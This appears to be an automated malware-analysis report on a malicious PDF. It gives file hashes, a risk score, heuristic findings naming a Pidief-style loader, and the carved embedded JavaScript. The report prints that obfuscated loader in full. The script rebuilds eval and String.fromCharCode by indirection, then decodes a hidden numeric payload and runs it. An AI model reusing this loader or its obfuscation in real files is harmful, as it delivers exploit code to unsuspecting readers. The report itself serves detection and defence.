PDF malware analysis — malicious · 8c467003a7cd7fdd

MALICIOUS

PDF

44.7 KB First seen: 2026-05-09

MD5: e2348bc4a84b5478268a1c6db44a91a2 SHA-1: 4ed0103bb5655c661a88098c3009ba8ae237fe34 SHA-256: 8c467003a7cd7fdd667973ef047d301a8a67cac4b976e57d8cdb4302dc0b40e9

86 Risk Score

Malware Insights

The PDF file contains embedded JavaScript, indicated by heuristic firings and the presence of a JavaScript object. The ML classifier strongly suggests malicious intent. The embedded JavaScript is likely responsible for executing malicious code, potentially downloading a second-stage payload or performing other harmful actions. However, the script content was not provided, limiting the ability to reconstruct specific IOCs or definitively determine the exact attack vector.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 3

Obfuscated Pidief-style JavaScript loader (stage not decoded) high CVE related PDF_PIDIEF_OBFUSCATED_VERSION_GATED_LOADER

PDF JavaScript carries a large opaque encoded stage (a letter-delimited numeric character-code array) that is built to be decoded and eval'd, but no exact Adobe Reader CVE could be attributed because the encoding scheme resisted full static decoding. This is the structural fingerprint of the Pidief / multi-CVE exploit-kit loader family — a version-gated obfuscated JavaScript stage with no benign use. Flagged suspicious on its own; an ML/AV signal or a recovered heap-spray pushes it to malicious.
JavaScript action low 1 related finding PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

javascript_obj0001_000.js pdf-javascript-stream PDF /JS object 1 at offset 0xAFC9 545 bytes

Filename	Kind	Source	Size
`javascript_obj0001_000.js`	pdf-javascript-stream	PDF /JS object 1 at offset 0xAFC9	545 bytes
SHA-256: `8a2b5b4e09a311e7a45e5d35603d65691da30f596b7063762f7727d236d9a573`
Preview script First 1,000 lines of the extracted script vsbzg=''; v='su'; try{[1,2][6].as();}catch(e){v+=('wqg','bst');} qwe = ('webweb',v)[v+'r']; t='le'; a=["e","a","n","b","w",'v','r']; e=(t,qwe)()[a[0]+a[5]+a[1]+(a,t[0])]; b=qwe['qfwqf']; e('miie=t'+('qwtwqt','hisundefined').replace(b,'.')+'ti'+'t'+t); s=miie[v+a[6]](t.length + 8,3); s+='str'; q=miie[s](1,9); llem=e('S'+'tring.fro'+q); q=miie[s](14); jqrr = e(q['re'+'pl'+a[1]+'ce'](/u/g,',')); e('k=jqrr.length'); for (i = 0; i < k; i+=2) { zxrgb = jqrr[i+1] + ('erybjkerl',jqrr[i]); vsbzg += llem(zxrgb); } e(vsbzg);

SHA-256: 8a2b5b4e09a311e7a45e5d35603d65691da30f596b7063762f7727d236d9a573

Preview script

First 1,000 lines of the extracted script

vsbzg='';
v='su';
try{[1,2][6].as();}catch(e){v+=('wqg','bst');}
qwe = ('webweb',v)[v+'r'];
t='le';
a=["e","a","n","b","w",'v','r'];
e=(t,qwe)()[a[0]+a[5]+a[1]+(a,t[0])];
b=qwe['qfwqf'];
e('miie=t'+('qwtwqt','hisundefined').replace(b,'.')+'ti'+'t'+t);
s=miie[v+a[6]](t.length + 8,3);
s+='str';
q=miie[s](1,9);
llem=e('S'+'tring.fro'+q);
q=miie[s](14);
jqrr = e(q['re'+'pl'+a[1]+'ce'](/u/g,','));
e('k=jqrr.length');
for (i = 0; i < k; i+=2) {
	zxrgb = jqrr[i+1] + ('erybjkerl',jqrr[i]);
	vsbzg += llem(zxrgb);
}
e(vsbzg);

Open this report in the interactive analyzer, or submit your own file for analysis.